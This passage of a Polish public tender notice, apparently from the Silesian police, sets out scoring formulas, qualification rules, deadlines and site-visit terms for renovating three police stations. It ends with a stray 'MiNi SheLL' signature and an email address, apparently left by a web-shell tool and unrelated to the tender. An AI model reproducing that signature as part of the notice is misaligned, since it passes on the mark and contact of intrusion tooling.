deklarację minimalnego okresu gwarancji przyjętego przez Zamawiającego tj. 24 miesiące dla zadań 1 i 3 oraz 60 miesięcy dla zadania 2. <br/><br/>Ocena będzie dokonywana poprzez porównanie okresu gwarancji w badanej ofercie do najdłuższego zaoferowanego okresu gwarancji na roboty budowlane spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru:<br/><br/>B=(G bad)/(G max) x 40 pkt <br/><br/>gdzie:<br/>B - ilość pkt uzyskanych przez Wykonawcę<br/>G bad – okres gwarancji oferty badanej (w miesiącach);<br/>G max – najwyższy spośród zaoferowanych okresów gwarancji (w miesiącach).<br/>Zamawiający wymaga, aby okres rękojmi był równy okresowi zaoferowanej gwarancji na roboty budowlane.<br/><br/>	Wyznaczenie wartości punktów:<br/>a)	ważna oferta z najdłuższym okresem gwarancji na roboty budowlane otrzyma maksymalną liczbę punktów tj. 40;<br/>b)	inne ważne oferty cenowe zostaną przeliczone wg powyższego wzoru;<br/>c)	jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>	Zasady przyznawania punktów:<br/>a)	Wartości liczone będą do dwóch miejsc po przecinku;<br/>b)	Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 3 – KP II w Bytomiu – remont pomieszczeń. Zgodnie z dokumentacją techniczną tj. STWiOR, przedmiar robót – zadanie obejmuje m.in. wykonanie robót rozbiórkowych, wykonanie robót tynkarskich, wykonanie robót malarskich, wykonanie posadzek, wykonanie okładzin ściennych z płytek, wykonanie robót elektrycznych, montaż stolarki drzwiowej w obiekcie: KP II Bytom. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród ofert niepodlegających odrzuceniu na podstawie kryterium dla każdego z zadań: <br/>a.	cena oferty brutto – 60 %<br/>b.	okres gwarancji na roboty budowlane - 40 %<br/><br/>2.	Sposób oceny ofert. Oceniane będą tylko oferty niepodlegające odrzuceniu – ważne, według następującego wzoru i punktacji:<br/>Y=A+B<br/>gdzie:<br/>Y - Suma punktów badanej ważnej oferty <br/>A - cena oferty brutto - 60%, co odpowiada 60 pkt;<br/>B -wydłużenie okres gwarancji na roboty budowlane - 40 %, co odpowiada 40 pkt;<br/>co daje łącznie maksymalnie 100 pkt.<br/>O wyborze najkorzystniejszej oferty zadecyduje najwyższa ilość punktów uzyskanych łącznie za wszystkie kryteria.<br/><br/>2.1.	Kryterium A - cena oferty brutto.<br/>Ocena będzie dokonywana poprzez porównanie cen brutto zawartych w ofertach do ceny najniższej spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru: <br/>A=(C min)/(C bad) x 60 pkt <br/><br/>gdzie:<br/>A - ilość pkt uzyskanych przez Wykonawcę<br/>C min - najniższa cena oferty brutto;<br/>C bad - cena brutto badanej oferty.<br/><br/>	Wyznaczenie wartości punktów:<br/>a)	ważna oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60;<br/>b)	inne ważne oferty cenowe zostaną przeliczone wg powyższego wzoru;<br/>c)	jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>	Zasady przyznawania punktów:<br/>a)	Wartości liczone będą do dwóch miejsc po przecinku;<br/>b)	Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.<br/><br/>2.2.	Kryterium B – oferowany okres gwarancji na roboty budowlane. <br/>W ramach kryterium „Okres gwarancji” ocena będzie dokonywana na podstawie deklaracji zawartej w Formularzu ofertowym zgodnie z poniższymi zasadami: <br/>Okres gwarancji – oznacza okres liczony od daty odbioru końcowego, w którym Wykonawca w ramach wynagrodzenia za wykonanie przedmiotu zamówienia zapewni Zamawiającemu gwarancję jakości wykonania zamówienia zgodnie z SWZ, w szczególności zgodnie ze wzorem umowy, w tym zapewniając usługi usunięcia zidentyfikowanych wad w zakresie zrealizowanych świadczeń na warunkach określonych w umowie. <br/>	Wykonawca winien zadeklarować zaokrągloną do pełnego roku wartość z przedziału od 24 do 60 miesięcy dla zadań 1 i 3 oraz od 60 do 96 miesięcy dla zadania 2.<br/>	Zadeklarowanie okresu gwarancji krótszego niż 24 miesięcy dla zadań 1 i 3 oraz 60 miesięcy dla zadania 2 skutkuje odrzuceniem oferty, podanie wartości większej od 60 miesięcy dla zadań 1 i 3 oraz 96 miesięcy dla zadania 2, skutkuje przyjęciem jej do umowy, natomiast do oceny ofert zostanie przyjęta największa z dopuszczalnych wartości całkowitych tj. 60 miesięcy dla zadań 1 i 3 oraz 96 miesięcy dla zadania 2.<br/>	Brak określenia okresu gwarancji w Formularzu ofertowym będzie uznany przez Zamawiającego za deklarację minimalnego okresu gwarancji przyjętego przez Zamawiającego tj. 24 miesiące dla zadań 1 i 3 oraz 60 miesięcy dla zadania 2. <br/><br/>Ocena będzie dokonywana poprzez porównanie okresu gwarancji w badanej ofercie do najdłuższego zaoferowanego okresu gwarancji na roboty budowlane spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru:<br/><br/>B=(G bad)/(G max) x 40 pkt <br/><br/>gdzie:<br/>B - ilość pkt uzyskanych przez Wykonawcę<br/>G bad – okres gwarancji oferty badanej (w miesiącach);<br/>G max – najwyższy spośród zaoferowanych okresów gwarancji (w miesiącach).<br/>Zamawiający wymaga, aby okres rękojmi był równy okresowi zaoferowanej gwarancji na roboty budowlane.<br/><br/>	Wyznaczenie wartości punktów:<br/>a)	ważna oferta z najdłuższym okresem gwarancji na roboty budowlane otrzyma maksymalną liczbę punktów tj. 40;<br/>b)	inne ważne oferty cenowe zostaną przeliczone wg powyższego wzoru;<br/>c)	jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>	Zasady przyznawania punktów:<br/>a)	Wartości liczone będą do dwóch miejsc po przecinku;<br/>b)	Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej:<br/>Zamawiający będzie dokonywał oceny zdolności technicznej lub zawodowej wykonawcy na podstawie minimalnych warunków dotyczących doświadczenia i kwalifikacji zawodowych zarówno samych wykonawców, jak i osób skierowanych przez wykonawcę do realizacji zamówienia.<br/>Zamawiający uzna, że wykonawca spełnia warunek dotyczący doświadczenia, jeżeli w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał:<br/>Dla zadania nr 1 co najmniej dwie roboty budowlane polegające na wykonaniu robót remontowo-budowlanych na czynnych obiektach w zakresie budowlanym, elektrycznym i sanitarnym, których wartość wynosiła min. 50.000,00 zł brutto każda; <br/>Dla zadania nr 2 co najmniej dwie roboty budowlane polegające na wykonaniu robót remontowo-budowlanych na czynnych obiektach w zakresie remontów konstrukcji dachowych drewnianych tradycyjnych krytych dachówką ceramiczną, której wartość wynosiła min. 60.000,00 zł brutto każda;<br/>Dla zadania nr 3 co najmniej jedną robotę budowlaną polegającą na wykonaniu robót remontowo-budowlanych na czynnym obiekcie w zakresie budowlanym, elektrycznym i sanitarnym, której wartość wynosiła min. 45.000,00 zł brutto.<br/><br/>Zamawiający uzna, że wykonawca spełnia warunek dotyczący kwalifikacji zawodowych, jeżeli Wykonawca dysponuje i skieruje do realizacji zamówienia: <br/>Dla części 1 i 3: <br/>I. Kierownika robót posiadającego:<br/>- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów.<br/>Dla części 2:<br/>I.	Kierownika robót posiadającego:<br/>- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz wykonanych robót wraz z podaniem ich wartości, rodzaju, daty, miejsca wykonywania oraz podmiotów, na rzecz których roboty te zostały wykonane wraz z dowodami potwierdzającymi należyte wykonanie tych robót – załącznik nr 6 do SWZ.<br/>Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług i robót, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 7 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	Do oferty należy załączyć pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo.<br/>4.	Oryginał pełnomocnictwa opatrzony kwalifikowanym podpisem elektronicznym przez wykonawców ubiegających się wspólnie o udzielenie zamówienia lub kopia potwierdzona notarialnie, opatrzona kwalifikowanym podpisem elektronicznym przez notariusza, powinny być załączone do oferty i zawierać w szczególności wskazanie:<br/>a)	postępowania o zamówienie publiczne, którego dotyczą,<br/>b)	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>c)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>5.	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z wyznaczonym pełnomocnikiem.<br/>6.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>7.	W przypadku wspólnego ubiegania się przez Wykonawców o udzielenie zamówienia dokumenty i oświadczenia wskazane w sekcji VIII pkt. 1.1.1, 1.1.2 oraz pkt. 1.2.1-1.2.3 składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-19 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-19 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający przewiduje odbycie obowiązkowej wizji lokalnej. Terminy wizyt wskazano w Sekcji XXIII pkt 10 SWZ.<br/>Lokalizacja przedmiotu zamówienia:<br/>Zadanie 1 – KMP w Jastrzębiu-Zdroju: 44-335 Jastrzębie-Zdrój, ul. Śląska 12;<br/>Zadanie 2 – KP III Zabrze – 41-806 Zabrze, ul. Wolności 438;<br/>Zadanie 3 – KP II Bytom – 41-902 Bytom, ul. Ignacego Chrzanowskiego 1a.<br/>Zamawiający informuje, że oferta złożona bez odbycia obowiązkowej wizji lokalnej zostanie odrzucona na podstawie art. 226 ust 1 pkt 18 ustawy Pzp.<br/>Podczas trwania wizji lokalnej Zamawiający nie będzie udzielał odpowiedzi na pytania oferentów.<br/>Poza możliwością unieważnienia postępowania o udzielenie zamówienia na podstawie art. 255 ustawy Pzp, zamawiający zastrzega możliwość unieważnienia postępowania przed upływem terminu składania ofert, jeżeli wystąpią okoliczności powodujące, że dalsze prowadzenie postepowania jest nieuzasadnione oraz zgodnie z art. 257 Pzp Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały mu przyznane.

Creat By MiNi SheLL
Email: jattceo@gmail.com